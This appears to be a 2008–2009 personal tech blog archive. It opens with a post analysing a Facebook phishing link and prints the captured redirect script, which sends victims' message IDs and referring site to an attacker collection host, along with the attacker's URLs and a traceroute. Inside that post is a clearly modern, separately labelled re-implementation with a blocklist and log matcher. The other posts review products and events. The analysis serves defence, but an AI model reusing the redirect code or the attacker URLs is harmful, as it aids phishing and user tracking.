Phishing on Facebook

Posted on July 14th, 2009 in Security | 2 Comments »

I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contained something that this person would probably never say to me, followed by a link. I immediately suspected that this was part of a phishing scam. Knowing that others who had also been sent the message might not realize the danger, I immediately told everyone not to click the link.

Now that the chance of others being taken advantage of by this scam was greatly reduced, I could begin my investigation into what sort of information the phishers were gathering. I fired up a terminal and went to work.

$ curl http://198.64.140.97/funnymovie/

nzmkuewnjpew hvsigccd
<script src="3jsum37jmq1z.js"></script>
uvqztdlft egjykgmuvrrzzmr

Well, that seemed odd. I didn’t understand the random characters, but the script tag made it completely obvious that they were up to no good. Let’s see what it does.

$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js

// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/';    // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com',  abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com',  abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['twitter.com',   abc+'tw.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
]; // 3
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) { // 4
     var redir=redirects[i][1] + location.search;
     if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
     location.href = redir;  //5
     r = true;
     break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

This find was definitely interesting. Let’s go step by step and figure out what they are doing.

First, I wanted to know about the site behind all of this, http://r-d-cgpay-090709.com. Its IP address and approximate location could be determined with a simple traceroute.

$ traceroute r-d-cgpay-090709.com

traceroute to r-d-cgpay-090709.com (61.235.117.71), 64 hops max, 40 byte packets
 1  192.168.1.1 (192.168.1.1)  9.331 ms  1.834 ms  2.213 ms
 2  * * *
 3  te-3-4-ur04.santaclara.ca.sfba.comcast.net (68.85.190.253)  11.358 ms  24.434 ms  16.903 ms
 4  be-70-ar01.oakland.ca.sfba.comcast.net (68.85.154.149)  28.483 ms  35.249 ms  16.347 ms
 5  pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.91.225)  22.579 ms  17.279 ms  14.378 ms
 6  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  20.288 ms  30.457 ms  27.989 ms
 7  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  23.593 ms  21.716 ms  20.496 ms
 8  tenge13-3.br02.sjo01.pccwbtn.net (63.218.179.25)  23.699 ms  19.488 ms  28.077 ms
 9  china-tietong.pos6-2.cr02.hkg04.pccwbtn.net (63.218.252.10)  414.604 ms  395.548 ms  397.325 ms
10  61.237.119.81 (61.237.119.81)  463.588 ms  414.780 ms  397.284 ms
11  61.237.112.74 (61.237.112.74)  399.872 ms * *
12  222.50.127.218 (222.50.127.218)  434.857 ms  415.261 ms  407.054 ms
13  61.235.116.130 (61.235.116.130)  402.744 ms  424.623 ms  408.174 ms
14  61.235.117.71 (61.235.117.71)  409.368 ms  391.156 ms  397.808 ms

Judging by the hop containing “china-tietong”, the IP address appeared to be somewhere in China. I was then curious whether they had a pattern of dubious behavior, so I entered their IP address into Google. According to the search results, McAfee identifies this IP as malicious, as it has been responsible for malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. I will walk through the lines I have numbered in the comments in the code above.

  1. This is the URL that they are using to capture the incoming information. (abc1 and abc2 are identical, so the branch on location.search in the following line makes no difference to the destination.)
  2. In JavaScript, location.search is the query section of the URL (everything after and including the ?). So in the case of Facebook, it would appear to be something like this: ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
  3. This table maps each originating site to a URL of the form http://r-d-cgpay-090709.com/go/fb.php, where the final page name differs for each service the user came from.
  4. The for loop checks whether document.referrer contains one of the site names from the redirects array. Once it has found a match, it creates a URL in the form: http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
  5. The browser is sent to this URL so that the attackers can gain information about the user that clicked on the link. The site does not send a reply back when visiting this URL.
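To check the walkthrough above without letting the script run in a browser, here is an added re-implementation of its routing logic (my code, not the captured script): it computes the collection URL for a given referrer and query string, lists every URL the script can redirect to, and flags constructed sample log lines that contain one. It assumes location.host is the host that served the script, since that is what the domain parameter carries in JavaScript.

```javascript
// Added example (not part of the original post): a side-effect-free
// re-implementation of the captured redirect script, so an analyst can see
// where a victim would be sent without running the original in a browser.
// Collection host and page names are copied from the captured script.
const COLLECT = 'http://r-d-cgpay-090709.com/go/';
const REDIRECTS = [
  ['facebook.com', 'fb.php'],   ['tagged.com', 'tg.php'],
  ['friendster.com', 'fr.php'], ['myspace.com', 'ms.php'],
  ['msplinks.com', 'ms.php'],   ['myyearbook.com', 'yb.php'],
  ['fubar.com', 'fu.php'],      ['twitter.com', 'tw.php'],
  ['hi5.com', 'hi5.php'],       ['bebo.com', 'be.php'],
];

// referrer: the victim's document.referrer; search: location.search on the
// phishing page ('' or '?...'); host: location.host of the phishing page,
// i.e. the server that served the script (assumption stated in the lead-in).
function resolveRedirect(referrer, search, host) {
  for (const [site, page] of REDIRECTS) {
    // The original uses a bare substring test, so any referrer containing
    // the site name matches, not only that site.
    if (referrer.indexOf(site) !== -1) {
      const sep = search.length > 0 ? '&' : '?';
      return { site, url: COLLECT + page + search + sep + 'domain=' + host };
    }
  }
  // Unknown referrer: the script falls through to index.php with the query.
  return { site: null, url: COLLECT + 'index.php' + search };
}

// Every URL the script can send a browser to; useful as a blocklist.
function collectionUrls() {
  const urls = new Set(REDIRECTS.map(([, page]) => COLLECT + page));
  urls.add(COLLECT + 'index.php');
  return [...urls].sort();
}

// Flag proxy/web log lines that contain one of those URLs.
function findHits(logLines) {
  const targets = collectionUrls();
  return logLines.filter((line) => targets.some((u) => line.includes(u)));
}

// Constructed sample log lines, not real log data.
const SAMPLE_LOG = [
  '10.0.0.5 - - [14/Jul/2009] "GET http://198.64.140.97/funnymovie/ HTTP/1.1" 200',
  '10.0.0.5 - - [14/Jul/2009] "GET http://r-d-cgpay-090709.com/go/fb.php?t=1&mbox_pos=0&domain=198.64.140.97 HTTP/1.1" 200',
  '10.0.0.9 - - [14/Jul/2009] "GET http://www.example.com/ HTTP/1.1" 200',
];
```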

However, the information they are collecting does not seem very interesting. They were able to obtain the ID of the message the URL was posted in, along with the originating site. Maybe it could be a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcome!

Diggnation: San Jose

Posted on August 26th, 2008 in Tech | No Comments »

I just got back from Diggnation live in San Jose at the Center for Performing Arts. It was hosted by Nvidia during their NVISION 2008 Conference. Enjoy the photos!

Before it started

Prager welcoming everyone

Start the show!

Diggnation!

Quicksilver Themes

Posted on August 24th, 2008 in Tech | 1 Comment »

I recently discovered a bunch of awesome Quicksilver themes developed by Julius Eckert and thought I should share them. I have been using “Showcase” because it provides a very clean interface, is visually striking, and uses Core Animation. Take a Look!

Review: Cuil

Posted on July 28th, 2008 in Review, TV | No Comments »

Cuil is a new search engine that went live today. Its goal is to provide more search results with greater accuracy than existing search engines such as Google. Currently it indexes over 120 billion web pages, which is substantially lower than Google’s claim of 1 trillion unique web pages. Cuil was founded by former Google employees Anna Patterson, Russell Power, and Louis Monier, and former IBM employee Tom Costello.

Cuil has some positive qualities, but currently it is not polished enough to replace my preferred search engine, Google.

Pros

  • UI: I tend to like darker user interfaces than most people, so I especially liked the contrasting black, dark blue, and white elements. Actually, it fits nicely with the theme of my blog. Overall, the look and feel seems uncluttered, which is largely due to the multi-column view of search results. This seems to prevent excessive scrolling when browsing the results.
  • Search Categories: When searching for “Seattle”, it divided the search into suggestions that were common for this search. Results included “Seattle Culture”, “Landmarks in Seattle”, etc. Below each category were listed search terms that fit into these categories.

Cons

  • Search Results: Several searches that I often do returned results that were not useful to me. Typing in my own name, “Erik Turnquist”, did not return my website, nor ericturnquist.com, which always comes up when searching Google. Searching for “Soccer wiki”, “Digg wiki”, “California wiki”, or even “California wikipedia” did not return a single result from Wikipedia. This is highly personal, but the searches I do often returned useless results.
  • Load Times: Page load times were far too long. Using Webkit r35417, searching for “Apple” took 8.20 seconds, compared to Google’s 355 milliseconds.

Although Cuil is currently having scaling and relevancy issues, I assume that many of those problems will be worked out over time. Conclusion: stick with Google.

Crosswalk

Posted on July 27th, 2008 in Photos | No Comments »

The last thing you expect while crossing the street.

Viewing iPhone Logs

Posted on July 25th, 2008 in Tech | No Comments »

I couldn’t find this mentioned on the web anywhere, but it might be useful if your iPhone is always crashing.

  1. Download and install the iPhone Configuration Utility
  2. Plug your iPhone into your computer.
  3. Launch the iPhone Configuration Utility located under /Applications/Utilities/iPhone Configuration Utility
  4. Click on the name of your iPhone under “Connected Devices”
  5. Open the “Console” tab
  6. Debug away!

Hello, iPhone

Posted on July 25th, 2008 in Announcements, Tech | 1 Comment »

I finally did it. I got an iPhone. I have been interested in purchasing one for some time, but still had about a year left in my T-Mobile contract. Using the advice from Consumerist, I was able to cancel my contract early because they were going to raise text messaging rates.

It took me two days to actually get the phone. Actually, it’s a funny story.

Day One

On Monday, I went to the Valley Fair Apple Store. When I arrived at 7:31pm I was told that the line had been capped and they would not be able to let me stand in line. I told them that I had taken the bus there, could not get off of work any earlier, and I was wearing an Apple t-shirt (thankfully). After some convincing, I was finally let into the line.

Then, my three hour wait began. At around 10:30pm, a group of six people and I were let into the Apple Store. At 10:35pm I was told, “Sorry, the AT&T servers have just shut down.” My response, “WHAT!?” Apparently, all of AT&T’s activation servers were unresponsive nationwide. Awesome. Thankfully, I was given a card that stated I had 24 hours to claim my iPhone with the guarantee that I would not have to stand in line again.

Day Two

I arrived at the Apple Store at about 9:10pm and waited about 10 minutes for someone to actually be available to help me (the employees looked really drained by this point). Finally, I was handed my 8GB black iPhone, and within 10 minutes my activation was complete. :-)

Target, target, target…

Posted on July 23rd, 2008 in Photos | No Comments »

As far as I could see.

A Revolution in Music: Spotify

Posted on July 19th, 2008 in Audio, Review, Tech | 7 Comments »

We have all heard of web streaming music services such as last.fm and Pandora, but I recently had the opportunity to use a desktop streaming music software called Spotify and was amazed.

Spotify, the company, was founded by entrepreneurs Daniel Ek and Martin Lorentzon and has its headquarters in Luxembourg. Spotify, the software, has been in beta for a little over a year and has gone through a number of revisions in the process. Currently, it offers an iTunes-like interface for both playing music and searching through their extensive collection of songs. Songs are organized into playlists simply by dragging them from the Spotify music library. Playing a song is as simple as double-clicking on it. Finding a song involves typing the title, artist, etc. into the search bar and then browsing through the search results.

Several areas of the product I especially enjoyed were:

Buffer Time

While using Spotify there was none. None while playing songs that had been streamed previously. None while playing obscure Seattle bands. It was incredible. Even my local music library takes longer to start playing songs when the hard drive has to spin up. I continued to test this with as many songs as I could and was not able to make it pause before a song started playing.

Overall Speed

Spotify offers clients for Windows and Mac OS X (could not find information about Linux). Everything in the interface was responsive. Search results were returned incredibly fast. Spotify felt solid and lightweight while being feature rich.

Library Size

The Spotify library had all of the popular music that I expected it to have, but it also included artists whose content many mainstream stores have difficulty supplying.

Although I had the chance to play with the Spotify beta, there were no ads in the version I was using. For the final release, ads will be added to the product, but in the non-intrusive manner outlined here.

Although I am not a part of the beta, I was able to get a glimpse at software that I believe could change the streaming music market and possibly change the way I listen to music. While online, being able to play any song you want to, anytime, at no cost is extremely hard to resist.

Special thanks to Erik Hammar for showing me this software.

Cupertino, CA

Posted on July 13th, 2008 in Announcements | No Comments »

devtech

So, I realized I never officially announced this, but this summer I am working at Apple as an intern in the Development Technologies group. Specifically, I will be working on Core Data with a small team of engineers.

Core Data allows Cocoa developers to create sophisticated data models which are automatically stored in XML, binary, SQLite, or their own database formats. Through the use of Xcode’s Data Model Design tool, developers can graphically specify entities, their attributes, and their relationships to other entities. At runtime this model is represented by an NSManagedObjectModel object. Data is saved, loaded, and fetched through the NSManagedObjectContext object, which serves as the front-end controller for the database. Data can be distributed across multiple databases, and multiple NSManagedObjectContext objects can interact with a single database.

For useful tutorials on CoreData, take a look at: